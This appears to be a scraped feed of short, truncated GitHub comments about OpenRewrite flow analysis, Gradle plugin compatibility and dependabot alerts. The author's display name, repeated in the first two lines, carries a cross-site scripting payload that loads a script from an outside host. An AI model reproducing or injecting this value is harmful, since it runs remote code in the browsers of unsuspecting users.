Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Rewrite-analysis also has support for Control Flow Analysis as well, which might be worth documenting as well. Here's an examination of that from CodeQL too (but specific to python in...
I kinda want to do a Data Flow and Control Flow API user crash course demo for the OpenRewrite team at some point. Maybe something we can record and post...
I had always intended to do this, but I couldn't figure out where to get this information out of the Gradle API. Hoping that @bigdaz has a better idea where...
Oh, interesting! You should consider presenting ORT to the Open Source Security Foundation in one of the WG meetings. https://openssf.org/getinvolved/ https://slack.openssf.org
I think I originally thought about using KotlinX, but the problem I quickly ran into was the range of versions of Kotlin I needed this project to support in order...
Passing tests is the most important part. You'll want to make sure it passes a test with the oldest version of Gradle. Also, at the end of the day, this...
> I'm actually considering going the other way, and porting the entire codebase to Java. Using Kotlin for a plugin that needs to support a wide range of Gradle versions...
The ShadowJar logic was originally what I found within the closed-source plugin-publish-plugin, which lives internally at Gradle within the same repository as the Gradle Plugin Portal codebase. I then took...
> BUT, linking the dependency to each subproject has the major downside of creating many more dependabot alerts for the project when this version needed upgrading. When working with real-world...
> So until we can reliably link a dependency version to the source file where it is defined, I'd prefer to point to the entire Gradle build (either settings.gradle or...